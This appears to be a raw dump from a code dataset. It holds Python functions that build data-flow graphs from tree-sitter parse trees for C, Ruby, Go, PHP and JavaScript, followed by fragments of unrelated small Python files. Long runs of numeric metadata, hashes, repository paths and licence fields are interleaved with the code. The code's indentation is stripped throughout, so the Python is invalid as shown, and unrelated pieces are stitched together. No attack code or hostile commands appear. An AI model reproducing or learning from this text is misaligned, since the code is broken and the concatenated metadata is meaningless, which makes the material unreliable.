dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
# elif root_node.type in enhanced_for_statement:
# name=root_node.child_by_field_name('name')
# value=root_node.child_by_field_name('value')
# body=root_node.child_by_field_name('body')
# DFG=[]
# for i in range(2):
# temp,states=DFG_java(value,index_to_code,states)
# DFG+=temp
# name_indexs=tree_to_variable_index(name,index_to_code)
# value_indexs=tree_to_variable_index(value,index_to_code)
# for index1 in name_indexs:
# idx1,code1=index_to_code[index1]
# for index2 in value_indexs:
# idx2,code2=index_to_code[index2]
# DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
# states[code1]=[idx1]
# temp,states=DFG_java(body,index_to_code,states)
# DFG+=temp
# dic={}
# for x in DFG:
# if (x[0],x[1],x[2]) not in dic:
# dic[(x[0],x[1],x[2])]=[x[3],x[4]]
# else:
# dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
# dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
# DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
# return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_c(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_c(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_c(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def DFG_ruby(root_node,index_to_code,states):
assignment=['assignment','operator_assignment']
if_statement=['if','elsif','else','unless','when']
for_statement=['for']
while_statement=['while_modifier','until']
do_first_statement=[]
def_statement=['keyword_parameter']
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
states=states.copy()
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('value')
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_ruby(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=[x for x in root_node.child_by_field_name('left').children if x.type!=',']
right_nodes=[x for x in root_node.child_by_field_name('right').children if x.type!=',']
if len(right_nodes)!=len(left_nodes):
left_nodes=[root_node.child_by_field_name('left')]
right_nodes=[root_node.child_by_field_name('right')]
if len(left_nodes)==0:
left_nodes=[root_node.child_by_field_name('left')]
if len(right_nodes)==0:
right_nodes=[root_node.child_by_field_name('right')]
if root_node.type=="operator_assignment":
left_nodes=[root_node.children[0]]
right_nodes=[root_node.children[-1]]
DFG=[]
for node in right_nodes:
temp,states=DFG_ruby(node,index_to_code,states)
DFG+=temp
for left_node,right_node in zip(left_nodes,right_nodes):
left_tokens_index=tree_to_variable_index(left_node,index_to_code)
right_tokens_index=tree_to_variable_index(right_node,index_to_code)
temp=[]
for token1_index in left_tokens_index:
idx1,code1=index_to_code[token1_index]
temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
[index_to_code[x][0] for x in right_tokens_index]))
states[code1]=[idx1]
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement:
temp,current_states=DFG_ruby(child,index_to_code,current_states)
DFG+=temp
else:
temp,new_states=DFG_ruby(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for i in range(2):
left_nodes=[root_node.child_by_field_name('pattern')]
right_nodes=[root_node.child_by_field_name('value')]
assert len(right_nodes)==len(left_nodes)
for node in right_nodes:
temp,states=DFG_ruby(node,index_to_code,states)
DFG+=temp
for left_node,right_node in zip(left_nodes,right_nodes):
left_tokens_index=tree_to_variable_index(left_node,index_to_code)
right_tokens_index=tree_to_variable_index(right_node,index_to_code)
temp=[]
for token1_index in left_tokens_index:
idx1,code1=index_to_code[token1_index]
temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
[index_to_code[x][0] for x in right_tokens_index]))
states[code1]=[idx1]
DFG+=temp
temp,states=DFG_ruby(root_node.child_by_field_name('body'),index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_ruby(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_ruby(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_ruby(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def DFG_go(root_node,index_to_code,states):
assignment=['assignment_statement',]
def_statement=['var_spec']
increment_statement=['inc_statement']
if_statement=['if_statement','else']
for_statement=['for_statement']
enhanced_for_statement=[]
while_statement=[]
do_first_statement=[]
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('value')
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_go(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=root_node.child_by_field_name('left')
right_nodes=root_node.child_by_field_name('right')
DFG=[]
temp,states=DFG_go(right_nodes,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(left_nodes,index_to_code)
value_indexs=tree_to_variable_index(right_nodes,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in increment_statement:
DFG=[]
indexs=tree_to_variable_index(root_node,index_to_code)
for index1 in indexs:
idx1,code1=index_to_code[index1]
for index2 in indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
flag=False
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement and flag is False:
temp,current_states=DFG_go(child,index_to_code,current_states)
DFG+=temp
else:
flag=True
temp,new_states=DFG_go(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in states:
if key not in new_states:
new_states[key]=states[key]
else:
new_states[key]+=states[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for child in root_node.children:
temp,states=DFG_go(child,index_to_code,states)
DFG+=temp
flag=False
for child in root_node.children:
if flag:
temp,states=DFG_go(child,index_to_code,states)
DFG+=temp
elif child.type=="for_clause":
if child.child_by_field_name('update') is not None:
temp,states=DFG_go(child.child_by_field_name('update'),index_to_code,states)
DFG+=temp
flag=True
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_go(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_go(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def DFG_php(root_node,index_to_code,states):
assignment=['assignment_expression','augmented_assignment_expression']
def_statement=['simple_parameter']
increment_statement=['update_expression']
if_statement=['if_statement','else_clause']
for_statement=['for_statement']
enhanced_for_statement=['foreach_statement']
while_statement=['while_statement']
do_first_statement=[]
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('default_value')
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_php(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=root_node.child_by_field_name('left')
right_nodes=root_node.child_by_field_name('right')
DFG=[]
temp,states=DFG_php(right_nodes,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(left_nodes,index_to_code)
value_indexs=tree_to_variable_index(right_nodes,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in increment_statement:
DFG=[]
indexs=tree_to_variable_index(root_node,index_to_code)
for index1 in indexs:
idx1,code1=index_to_code[index1]
for index2 in indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
flag=False
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement and flag is False:
temp,current_states=DFG_php(child,index_to_code,current_states)
DFG+=temp
else:
flag=True
temp,new_states=DFG_php(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in states:
if key not in new_states:
new_states[key]=states[key]
else:
new_states[key]+=states[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for child in root_node.children:
temp,states=DFG_php(child,index_to_code,states)
DFG+=temp
flag=False
for child in root_node.children:
if flag:
temp,states=DFG_php(child,index_to_code,states)
DFG+=temp
elif child.type=="assignment_expression":
flag=True
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in enhanced_for_statement:
name=None
value=None
for child in root_node.children:
if child.type=='variable_name' and value is None:
value=child
elif child.type=='variable_name' and name is None:
name=child
break
body=root_node.child_by_field_name('body')
DFG=[]
for i in range(2):
temp,states=DFG_php(value,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
temp,states=DFG_php(body,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_php(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_php(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_php(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
def DFG_javascript(root_node,index_to_code,states):
assignment=['assignment_pattern','augmented_assignment_expression']
def_statement=['variable_declarator']
increment_statement=['update_expression']
if_statement=['if_statement','else']
for_statement=['for_statement']
enhanced_for_statement=[]
while_statement=['while_statement']
do_first_statement=[]
states=states.copy()
if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
if root_node.type==code:
return [],states
elif code in states:
return [(code,idx,'comesFrom',[code],states[code].copy())],states
else:
if root_node.type=='identifier':
states[code]=[idx]
return [(code,idx,'comesFrom',[],[])],states
elif root_node.type in def_statement:
name=root_node.child_by_field_name('name')
value=root_node.child_by_field_name('value')
DFG=[]
if value is None:
indexs=tree_to_variable_index(name,index_to_code)
for index in indexs:
idx,code=index_to_code[index]
DFG.append((code,idx,'comesFrom',[],[]))
states[code]=[idx]
return sorted(DFG,key=lambda x:x[1]),states
else:
name_indexs=tree_to_variable_index(name,index_to_code)
value_indexs=tree_to_variable_index(value,index_to_code)
temp,states=DFG_javascript(value,index_to_code,states)
DFG+=temp
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in assignment:
left_nodes=root_node.child_by_field_name('left')
right_nodes=root_node.child_by_field_name('right')
DFG=[]
temp,states=DFG_javascript(right_nodes,index_to_code,states)
DFG+=temp
name_indexs=tree_to_variable_index(left_nodes,index_to_code)
value_indexs=tree_to_variable_index(right_nodes,index_to_code)
for index1 in name_indexs:
idx1,code1=index_to_code[index1]
for index2 in value_indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in increment_statement:
DFG=[]
indexs=tree_to_variable_index(root_node,index_to_code)
for index1 in indexs:
idx1,code1=index_to_code[index1]
for index2 in indexs:
idx2,code2=index_to_code[index2]
DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
states[code1]=[idx1]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in if_statement:
DFG=[]
current_states=states.copy()
others_states=[]
flag=False
tag=False
if 'else' in root_node.type:
tag=True
for child in root_node.children:
if 'else' in child.type:
tag=True
if child.type not in if_statement and flag is False:
temp,current_states=DFG_javascript(child,index_to_code,current_states)
DFG+=temp
else:
flag=True
temp,new_states=DFG_javascript(child,index_to_code,states)
DFG+=temp
others_states.append(new_states)
others_states.append(current_states)
if tag is False:
others_states.append(states)
new_states={}
for dic in others_states:
for key in dic:
if key not in new_states:
new_states[key]=dic[key].copy()
else:
new_states[key]+=dic[key]
for key in states:
if key not in new_states:
new_states[key]=states[key]
else:
new_states[key]+=states[key]
for key in new_states:
new_states[key]=sorted(list(set(new_states[key])))
return sorted(DFG,key=lambda x:x[1]),new_states
elif root_node.type in for_statement:
DFG=[]
for child in root_node.children:
temp,states=DFG_javascript(child,index_to_code,states)
DFG+=temp
flag=False
for child in root_node.children:
if flag:
temp,states=DFG_javascript(child,index_to_code,states)
DFG+=temp
elif child.type=="variable_declaration":
flag=True
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
elif root_node.type in while_statement:
DFG=[]
for i in range(2):
for child in root_node.children:
temp,states=DFG_javascript(child,index_to_code,states)
DFG+=temp
dic={}
for x in DFG:
if (x[0],x[1],x[2]) not in dic:
dic[(x[0],x[1],x[2])]=[x[3],x[4]]
else:
dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
return sorted(DFG,key=lambda x:x[1]),states
else:
DFG=[]
for child in root_node.children:
if child.type in do_first_statement:
temp,states=DFG_javascript(child,index_to_code,states)
DFG+=temp
for child in root_node.children:
if child.type not in do_first_statement:
temp,states=DFG_javascript(child,index_to_code,states)
DFG+=temp
return sorted(DFG,key=lambda x:x[1]),states
| 44.409319
| 143
| 0.561315
| 8,665
| 61,951
| 3.800115
| 0.017426
| 0.060253
| 0.076834
| 0.016156
| 0.960004
| 0.950437
| 0.943878
| 0.934888
| 0.927387
| 0.918762
| 0
| 0.02606
| 0.306872
| 61,951
| 1,394
| 144
| 44.441176
| 0.740778
| 0.037045
| 0
| 0.915332
| 0
| 0
| 0.042347
| 0.004849
| 0
| 0
| 0
| 0
| 0.000763
| 1
| 0.006865
| false
| 0
| 0.001526
| 0
| 0.07704
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f8d356e865610135fadf784854d97b0eef7c761
| 237
|
py
|
Python
|
2019-06-06-ten-tips-python-web-devs-kennedy/code/top_10_web_explore/ex08_docker/services/movie_svc/routes.py
|
skolbin-ssi/WintellectWebinars
|
63612580c7c2f7d0c6dca930abba5696b2f40286
|
[
"Apache-2.0"
] | 32
|
2019-09-25T07:35:40.000Z
|
2021-03-15T09:15:39.000Z
|
2019-06-06-ten-tips-python-web-devs-kennedy/code/top_10_web_explore/ex08_docker/services/movie_svc/routes.py
|
skolbin-ssi/WintellectWebinars
|
63612580c7c2f7d0c6dca930abba5696b2f40286
|
[
"Apache-2.0"
] | 28
|
2021-03-10T08:24:07.000Z
|
2022-03-02T07:26:39.000Z
|
2019-06-06-ten-tips-python-web-devs-kennedy/code/top_10_web_explore/ex08_docker/services/movie_svc/routes.py
|
skolbin-ssi/WintellectWebinars
|
63612580c7c2f7d0c6dca930abba5696b2f40286
|
[
"Apache-2.0"
] | 8
|
2019-09-25T21:42:04.000Z
|
2021-05-23T13:44:14.000Z
|
# noinspection PyUnresolvedReferences
from app_instance import api
# noinspection PyUnresolvedReferences
from views.api_views import *
# noinspection PyUnresolvedReferences
from views.home import *
api.add_route("/static", static=True)
| 26.333333
| 37
| 0.835443
| 26
| 237
| 7.5
| 0.5
| 0.523077
| 0.584615
| 0.441026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 237
| 8
| 38
| 29.625
| 0.915493
| 0.451477
| 0
| 0
| 0
| 0
| 0.055556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e26409204e697385e660b80e7d7e5f379eae1afa
| 62
|
py
|
Python
|
__init__.py
|
tanayrastogi/faceDetection
|
7d55ef01d1d35c36b1f11895da6c5e7baceadfbd
|
[
"MIT"
] | null | null | null |
__init__.py
|
tanayrastogi/faceDetection
|
7d55ef01d1d35c36b1f11895da6c5e7baceadfbd
|
[
"MIT"
] | null | null | null |
__init__.py
|
tanayrastogi/faceDetection
|
7d55ef01d1d35c36b1f11895da6c5e7baceadfbd
|
[
"MIT"
] | null | null | null |
from .detection import CaffeModel
from .detection import MTCNN
| 31
| 33
| 0.854839
| 8
| 62
| 6.625
| 0.625
| 0.490566
| 0.716981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112903
| 62
| 2
| 34
| 31
| 0.963636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e2a09c05edbc91c52dfd10914130a348b3f17321
| 145
|
py
|
Python
|
cli_bdd/behave/steps/__init__.py
|
fionn/cli-bdd
|
77852405c571324efca5f7483cd31e94d00a5985
|
[
"MIT"
] | 8
|
2016-05-17T21:32:28.000Z
|
2022-02-12T08:59:59.000Z
|
cli_bdd/behave/steps/__init__.py
|
fionn/cli-bdd
|
77852405c571324efca5f7483cd31e94d00a5985
|
[
"MIT"
] | 7
|
2016-04-24T07:54:07.000Z
|
2020-06-16T15:38:52.000Z
|
cli_bdd/behave/steps/__init__.py
|
fionn/cli-bdd
|
77852405c571324efca5f7483cd31e94d00a5985
|
[
"MIT"
] | 4
|
2018-02-21T11:19:24.000Z
|
2019-06-10T17:53:29.000Z
|
# flake8: noqa
from cli_bdd.behave.steps.environment import *
from cli_bdd.behave.steps.command import *
from cli_bdd.behave.steps.file import *
| 29
| 46
| 0.8
| 23
| 145
| 4.913043
| 0.478261
| 0.185841
| 0.265487
| 0.424779
| 0.663717
| 0.477876
| 0
| 0
| 0
| 0
| 0
| 0.007692
| 0.103448
| 145
| 4
| 47
| 36.25
| 0.861538
| 0.082759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c54f6d58364389bd08fc0fbf7842886fa81c3f1
| 102
|
py
|
Python
|
hmlf/algorithms/sac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-05T05:59:55.000Z
|
2021-05-05T05:59:55.000Z
|
hmlf/algorithms/sac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | 1
|
2021-05-18T07:51:46.000Z
|
2021-05-18T07:51:46.000Z
|
hmlf/algorithms/sac/__init__.py
|
lorenzob123/HMLF
|
3577c61b8f2bae7959de81dfd3981c3a8e26d8b6
|
[
"MIT"
] | null | null | null |
from hmlf.algorithms.sac.policies import CnnPolicy, MlpPolicy
from hmlf.algorithms.sac.sac import SAC
| 34
| 61
| 0.843137
| 15
| 102
| 5.733333
| 0.533333
| 0.186047
| 0.418605
| 0.488372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 102
| 2
| 62
| 51
| 0.924731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e2e1ac7d2581b3ea4526fff99abcfcf773a19e7b
| 27,762
|
py
|
Python
|
tests/system/test_vpcsc_v3.py
